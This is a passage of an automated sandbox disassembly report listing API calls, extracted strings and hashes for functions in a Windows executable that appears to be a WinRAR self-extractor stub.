                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID: 0du
                                                                                    • API String ID: 776569668-4208203666
                                                                                    • Opcode ID: 023a83f38d76d0b70f45c7ad2d928e75bf1c860736654705ac7f3dc193b4f189
                                                                                    • Instruction ID: f7239fa5934696947d1810d7b22ba277d5667f5e82dc0aad24bd240ac6110089
                                                                                    • Opcode Fuzzy Hash: 023a83f38d76d0b70f45c7ad2d928e75bf1c860736654705ac7f3dc193b4f189
                                                                                    • Instruction Fuzzy Hash: 65119F76A1110DEFCB41EF94C886CDD3BB5AF18350B5154A1FA088B2A2DF36EA509F85
                                                                                    Function 00739711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00739736
                                                                                    • _wcslen.LIBCMT ref: 007397D6
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 007397E5
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00739806
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0073982D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                    • String ID: Fjuns$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                    • API String ID: 1777411235-1427121991
                                                                                    • Opcode ID: cf38d734efac6ec19bf730220f392ee0a61107960667e64d6122e1cc668f4977
                                                                                    • Instruction ID: a5d0d0d53a34af455f92c5e3dec791cc15bdbf87c1b5800f2b1509e4f2fb34fe
                                                                                    • Opcode Fuzzy Hash: cf38d734efac6ec19bf730220f392ee0a61107960667e64d6122e1cc668f4977
                                                                                    • Instruction Fuzzy Hash: 3E313972109711BAF725AB349C0AFEF7798EF82711F10051DF601961D3EBEC9A4883A6
                                                                                    Function 0073D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindow.USER32(?,00000005), ref: 0073D6C1
                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0073D6ED
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0073D709
                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0073D720
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0073D734
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0073D75D
                                                                                    • DeleteObject.GDI32(00000000), ref: 0073D764
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0073D76D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 3820355801-1882779555
                                                                                    • Opcode ID: ad3636314b9cd7982434d3a4b5c938716bae4b4a0ee80c605b44b2412e10fabc
                                                                                    • Instruction ID: 4b728aaaaac63cd8519b2a435c44cffcd0b11676a83032c4d5ba09ad926b6aa8
                                                                                    • Opcode Fuzzy Hash: ad3636314b9cd7982434d3a4b5c938716bae4b4a0ee80c605b44b2412e10fabc
                                                                                    • Instruction Fuzzy Hash: 8611E772640710BBF2316BB4AC4FFAF765CAB54B51F108121FA51A50D3D76C8F0546BA
                                                                                    Function 00742E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 322700389-393685449
                                                                                    • Opcode ID: 93c13d4189b63901646dc39c978850f17ab0a0b99b433c873188ab3fa37c2d8b
                                                                                    • Instruction ID: d7b69a1f8a17e27655e8811280469f9fc545f9d45e39ebd6472f1e96a4043a26
                                                                                    • Opcode Fuzzy Hash: 93c13d4189b63901646dc39c978850f17ab0a0b99b433c873188ab3fa37c2d8b
                                                                                    • Instruction Fuzzy Hash: FFB19B71900209EFCF29DFA4C8859AEBBB5FF14310F54415AF8196B212D739EA62CF91
                                                                                    Function 0072AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$ns
                                                                                    • API String ID: 3519838083-985232756
                                                                                    • Opcode ID: f840231bce9fcafaea3ae0b8195eea8b66582a82d35bcba53529c014c8f894e9
                                                                                    • Instruction ID: 185e538e7b095180a3f616880f2860667cb141f43730761bc760e75808e655d2
                                                                                    • Opcode Fuzzy Hash: f840231bce9fcafaea3ae0b8195eea8b66582a82d35bcba53529c014c8f894e9
                                                                                    • Instruction Fuzzy Hash: CA718970A00629EFDB14DFA4DC959AEB7B8FF48751B04415DF512A72A0CB78AE02CB60
                                                                                    Function 00726FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00726FAA
                                                                                    • _wcslen.LIBCMT ref: 00727013
                                                                                    • _wcslen.LIBCMT ref: 00727084
                                                                                      • Part of subcall function 00727A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00727AAB
                                                                                      • Part of subcall function 00727A9C: GetLastError.KERNEL32 ref: 00727AF1
                                                                                      • Part of subcall function 00727A9C: CloseHandle.KERNEL32(?), ref: 00727B00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 3122303884-3508440684
                                                                                    • Opcode ID: 9346dfd6219affe3c430022967f26a9fccf4191c6ae6cfca555491f938f508d7
                                                                                    • Instruction ID: 5e9f567ec094bd9b8b900e1d972c91634fa0be7a3624b1470074dc748998eb4b
                                                                                    • Opcode Fuzzy Hash: 9346dfd6219affe3c430022967f26a9fccf4191c6ae6cfca555491f938f508d7
                                                                                    • Instruction Fuzzy Hash: 4641F7B1D08364FAEB34E774AD8AFEE776C9F44344F004455FA45A6182D77CAA88C721
                                                                                    Function 0073B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073B610
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0073B637
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050E74), ref: 0073B650
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0073B661
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0073B66A
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0073B67E
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0073B694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 3214253823-2177901306
                                                                                    • Opcode ID: da57e0f730f20ba54d89bce4dfbd8ea5773978c81ba07e954c12a2441b8c2d86
                                                                                    • Instruction ID: b776dd6c79ab9deb3ef3f209db4b42d927ad3c66c33b548e9283e6b953799af8
                                                                                    • Opcode Fuzzy Hash: da57e0f730f20ba54d89bce4dfbd8ea5773978c81ba07e954c12a2441b8c2d86
                                                                                    • Instruction Fuzzy Hash: 4521F632244204FBE2119F69ED4EF3B3B6DEB46F81F118018F705950A3DB6E9901973A
                                                                                    Function 0073FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,F6FA6336,00000001,00000000,00000000,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FD99
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FE14
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0073FE1F
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE48
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE52
                                                                                    • GetLastError.KERNEL32(80070057,F6FA6336,00000001,00000000,00000000,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FE57
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE6A
                                                                                    • GetLastError.KERNEL32(00000000,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FE80
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE93
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 1353541977-0
                                                                                    • Opcode ID: a517702a1389840702c01ffb1a1cd84ee1f95e1fa5c3ea68c0bbd296a9e343f5
                                                                                    • Instruction ID: 19f189fa81ca63fbfb158f0a27fcba4caa6c76a075458906fb964516dbdbb5ed
                                                                                    • Opcode Fuzzy Hash: a517702a1389840702c01ffb1a1cd84ee1f95e1fa5c3ea68c0bbd296a9e343f5
                                                                                    • Instruction Fuzzy Hash: DB41ECB1E40319EBE7109F64CC49BAFB7A4EB44791F104239F905D7262D77C990087A5
                                                                                    Function 00729382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00729387
                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007293AA
                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007293C9
                                                                                      • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    • _swprintf.LIBCMT ref: 00729465
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 007294D4
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00729514
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: rtmp%d
                                                                                    • API String ID: 3726343395-3303766350
                                                                                    • Opcode ID: f2fea010530086642c7a1f8d298a3b15a2ee056d8353efbdd0cff36858bea7d3
                                                                                    • Instruction ID: 8b6838eec779f7de7ac999614df0eb8430d0774df952fe32afc5ec06a05a8fbb
                                                                                    • Opcode Fuzzy Hash: f2fea010530086642c7a1f8d298a3b15a2ee056d8353efbdd0cff36858bea7d3
                                                                                    • Instruction Fuzzy Hash: E9418771900278E6DF21EF61EC49DDE737CAF45340F1448A5B709E3092DA7C8B898B60
                                                                                    Function 00721100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Us$ps$zs
                                                                                    • API String ID: 176396367-29227579
                                                                                    • Opcode ID: 20a5a710893f9edbdbb007f8eb2b1a66ed014212277e46ea1890a5f1458b2d1e
                                                                                    • Instruction ID: 7fa81c96801606b420cf1262a3342edcff88140508646429081132755a28d634
                                                                                    • Opcode Fuzzy Hash: 20a5a710893f9edbdbb007f8eb2b1a66ed014212277e46ea1890a5f1458b2d1e
                                                                                    • Instruction Fuzzy Hash: 3641C271A00669DBDB219F689C0A9EF7BB8EF00310F004029F946E7245DB38AE458BA5
                                                                                    Function 00739ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00739EEE
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00739F44
                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00739FDB
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00739FE3
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00739FF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$RectText
                                                                                    • String ID: s$RarHtmlClassName
                                                                                    • API String ID: 3937224194-2805421010
                                                                                    • Opcode ID: 4f486ab90a8cf8caff2c7d1d23c07b2fba7676e78e31f5c843586339a240acde
                                                                                    • Instruction ID: 055497f56a1bb489f171269d678727e5db2d3f0e3fd3a598f5248f564a74bee7
                                                                                    • Opcode Fuzzy Hash: 4f486ab90a8cf8caff2c7d1d23c07b2fba7676e78e31f5c843586339a240acde
                                                                                    • Instruction Fuzzy Hash: 7241E031404214EFEB219F68DC8DB6B7BA8FF48B01F108529F9499A152EB7CD904CB66
                                                                                    Function 00731218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 0073122E
                                                                                      • Part of subcall function 0072B146: GetVersionExW.KERNEL32(?), ref: 0072B16B
                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00731251
                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00731263
                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00731274
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731284
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731294
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 007312CF
                                                                                    • __aullrem.LIBCMT ref: 00731379
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                    • String ID:
                                                                                    • API String ID: 1247370737-0
                                                                                    • Opcode ID: edc4ecadca390cce76dece67c7c265a38b9a2ed6d19446e6fa4cb6beaa9f1d86
                                                                                    • Instruction ID: 979e82c4de7183d880ec0024101bd8e607c5a5417ad12b2e9311653acb0804f1
                                                                                    • Opcode Fuzzy Hash: edc4ecadca390cce76dece67c7c265a38b9a2ed6d19446e6fa4cb6beaa9f1d86
                                                                                    • Instruction Fuzzy Hash: F44156B1508305AFD710DF65C8849ABBBF9FF88314F40892EF596C2211E738E609CB52
                                                                                    Function 00722210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 00722536
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
